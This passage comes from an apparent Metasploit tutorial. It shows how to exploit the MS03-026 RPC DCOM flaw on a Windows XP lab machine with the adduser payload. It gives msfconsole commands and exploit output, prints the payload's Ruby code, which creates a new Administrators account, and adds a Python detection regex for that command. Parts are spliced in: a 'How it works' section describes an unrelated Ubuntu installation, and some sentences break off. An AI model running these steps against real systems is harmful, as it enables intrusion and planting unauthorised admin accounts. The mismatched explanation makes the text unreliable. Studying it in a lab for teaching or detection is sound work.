

0 Windows NT SP3-6a/2000/XP/2003 Universal

Here, we can see that the dcom exploit is available for several flavors of the Windows machine.

In Chapter 1, Metasploit Quick Tips for Security Professionals, we discussed how the entire Metasploit framework has a modular architecture. Each exploit is packaged as a module in a form the framework understands, so that it can be loaded and run by the framework. Different commands are called to load and set up the modules. The command-line interface of msfconsole makes it easy to access different modules and perform penetration testing.

Penetration testing on a Windows XP SP2 machine

Let us now get our hands into the world of exploits. To start with, we will work on the most basic, yet most widely used, operating system, Windows XP. In this recipe, we will see how we can use Metasploit to break into our target system, which is running Windows XP. We will be using the commands we learned in the previous section, and then move ahead to select exploits and payloads, and set up the various required parameters.

Getting ready

We will start our penetration testing process right from msfconsole. So, launch the console and perform a port scan to gather information about the target. We discussed port scanning in detail in the previous chapter. Here, I will assume that you have gathered information about

How to do it...

To perform penetration testing on a Windows XP SP2 machine, follow these steps:

1. The primary goal will be to select an exploit that can be used on a Windows XP machine. You can browse to the /exploits/windows directory, or simply search for a list of available exploits for the Windows XP platform. We will be using the RPC dcom vulnerability to penetrate our target. So, let us first search for the RPC dcom vulnerability, using the following command:

msf exploit(ms03_026_dcom) > search dcom

Matching Modules
================

   Name                                       Disclosure Date  Rank   Description
   ----                                       ---------------  ----   -----------
   exploit/windows/dcerpc/ms03_026_dcom       2003-07-16       great  Microsoft RPC
   exploit/windows/driver/broadcom_wifi_ssid  2006-11-11       low    Broadcom Wireless
   exploit/windows/smb/ms04_031_netdde        2004-10-12       good   Microsoft NetDDE

As we can see, the search has produced three results. We will be working on the first exploit, as its rank is listed as great and it will have a better success rate.

2. In order to set exploit/windows/dcerpc/ms03_026_dcom as the usable exploit, we will execute the following command:

msf exploit(ms03_026_dcom) > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) >

The change in the prompt symbolizes that the command is executed successfully.

3. The next step is to set up the various parameters of the exploit. The show options command will list the available parameters in the exploit. Then, by using the set command, we can set up the various parameters. Some parameters will have default values as well:

msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  135              yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Windows NT SP3-6a/2000/XP/2003 Universal

Here, RHOST denotes the IP address of the remote host and RPORT denotes the default bind port. The value of RPORT has been set to 135 by default. We will have to set the value of RHOST to our target IP address in order to execute the exploit:

msf exploit(ms03_026_dcom) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf exploit(ms03_026_dcom) >

Note that the ms03_026_dcom exploit has the ID set to 0. This means that we do not need to specify which Windows machine is running on the target. It can exploit any of the Windows machines listed in it. For any other exploit, we may have to select the target operating system by using the show targets command.

Now, the value of RHOST has been set to our target IP address. If we try to run the exploit, we will get an error message, because we have not yet selected any payload for the exploit.

4. Our next step is to choose a relevant payload. We can use the command show payloads to list all the available payloads. We will start with a simple example of the windows/adduser payload. This payload will add a new user in the target's operating system:

msf exploit(ms03_026_dcom) > set PAYLOAD windows/adduser
PAYLOAD => windows/adduser

5. Now, if we again use the show options command, it will list the parameters for both the exploit and the payload. The payload parameters will look something like the following:

We can see that the default username and password that will be added to our target operating system is metasploit and metasploit. We can change these values by using the set PASS and set USER commands.

6. Now that our payload is set, we are ready to penetrate the target machine. We will use the following command to launch the exploit:

msf exploit(ms03_026_dcom) > exploit

[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.56.102[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.56.102[135] ...
[*] Sending exploit ...
[*] Exploit completed, but no session was created.

The last line of the output shows that the exploit was completed successfully on the target machine. Now, there will be a new user added in the target machine. The output also says that no session was created. This is because the payload we used was a simple adduser that doesn't need any active session. Hence, once the exploit

How it works...

The installation process demonstrated previously is a simple Ubuntu-based installation procedure for almost all the software. Once the installation is complete, you can run hash -r to reload your path.

This installation process can be followed on almost all flavors and versions of Linux.

There's more...

There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results from incorrect handling of malformed messages. This particular vulnerability affects a Distributed Component Object Model (DCOM) interface with RPC, which listens on RPC-enabled ports. So, the target machine must have an available port running an RPC service.

This interface handles the DCOM object activation requests that are sent by client machines to the server. An attacker who successfully exploited this vulnerability would be able to run code with Local System privileges on an affected system. The attacker would be able to take any action on the system. This includes installing programs, viewing/changing/deleting data, or creating new accounts with full privileges.

For more details on this vulnerability, you can visit the following link to the Microsoft Security Bulletin: http://technet.microsoft.com/en-us/security/bulletin/ms03-026. Now, in order to understand the working of the adduser payload, we will analyze the Ruby code for the payload. Let us browse to the payload location:

root@bt:~# cd /pentest/exploits/framework3/modules/payloads/singles/windows
root@bt:/pentest/exploits/framework3/modules/payloads/singles/windows# less adduser.rb

The following part of the code is of interest for us:

    # Register command execution options
    register_options(
      [
        OptString.new('USER', [ true, "The username to create", "metasploit" ]),
        # The PASS option is registered in the same way; this line was dropped
        # from the extracted listing and is restored here.
        OptString.new('PASS', [ true, "The password for this user", "metasploit" ]),
      ], self.class)

    # Hide the CMD option
    deregister_options('CMD')
  end   # end of initialize (the start of the method is not shown above)

  #
  # Override the exec command string
  #
  def command_string
    user = datastore['USER'] || 'metasploit'
    pass = datastore['PASS'] || ''

    # net user cannot set a password longer than 14 characters on these targets
    if(pass.length > 14)
      raise ArgumentError, "Password for the adduser payload must be 14 characters or less"
    end

    return "cmd.exe /c net user #{user} #{pass} /ADD && " +
      "net localgroup Administrators #{user} /ADD"
  end

You can understand the code through the comments added with the # symbol. The code is simple and self-explanatory. It first registers the options for the username and password. Then, it hides the CMD option (inherited from the windows/exec payload) by deregistering it, so that it does not appear while the payload gets executed. Next, the code overrides the windows/exec command string to pass the parameter values and launch a stealth command prompt that executes in the background.

You can play with the code and make your own changes. This will help you dig deeper into the world of payloads.
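From the defender's side, the command string that command_string builds is itself a usable detection signature: one cmd.exe process whose command line both creates a user and adds it to Administrators. The following Python is an added example, not code from the book or from Metasploit; it runs that pattern over a few constructed process-creation records whose fields loosely mimic Windows event 4688 (the records, host names and paths are made up for the example).

```python
import re

# Regex for the exact shape of the adduser payload's command string:
#   cmd.exe /c net user <user> <pass> /ADD && net localgroup Administrators <user> /ADD
# The back-reference requires the same user name in both halves.
ADDUSER_RE = re.compile(
    r"cmd\.exe\s+/c\s+net\s+user\s+(?P<user>\S+)\s+(?P<pass>\S+)\s+/ADD\s*&&\s*"
    r"net\s+localgroup\s+Administrators\s+(?P=user)\s+/ADD",
    re.IGNORECASE,
)

# Constructed sample records (key=value pairs, modelled on event 4688 fields).
SAMPLE_EVENTS = [
    "EventID=4688 ParentProcessName=C:\\Windows\\System32\\svchost.exe "
    "NewProcessName=C:\\Windows\\System32\\cmd.exe "
    "CommandLine=cmd.exe /c net user metasploit metasploit /ADD && "
    "net localgroup Administrators metasploit /ADD",
    "EventID=4688 ParentProcessName=C:\\Windows\\explorer.exe "
    "NewProcessName=C:\\Windows\\System32\\cmd.exe "
    "CommandLine=cmd.exe /c dir C:\\Users",
    "EventID=4688 ParentProcessName=C:\\Windows\\System32\\svchost.exe "
    "NewProcessName=C:\\Windows\\System32\\cmd.exe "
    "CommandLine=cmd.exe /c net user backup Pa55word /ADD && "
    "net localgroup Administrators backup /ADD",
]


def parse_event(line):
    """Split a key=value record into a dict; a value runs until the next ' key='."""
    return {m.group(1): m.group(2)
            for m in re.finditer(r"(\w+)=(.*?)(?= \w+=|$)", line)}


def find_adduser_payloads(events):
    """Return one finding per record whose command line matches the payload shape."""
    findings = []
    for line in events:
        ev = parse_event(line)
        m = ADDUSER_RE.search(ev.get("CommandLine", ""))
        if not m:
            continue
        parent = ev.get("ParentProcessName", "")
        findings.append({
            "user": m.group("user"),
            "parent": parent,
            # The payload runs inside the exploited RPC service, so a cmd.exe whose
            # parent is svchost.exe (the RPCSS service host) is the stronger signal.
            "parent_is_service_host": parent.lower().endswith("svchost.exe"),
        })
    return findings


if __name__ == "__main__":
    for finding in find_adduser_payloads(SAMPLE_EVENTS):
        print(finding)
```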

Binding a shell to the target for remote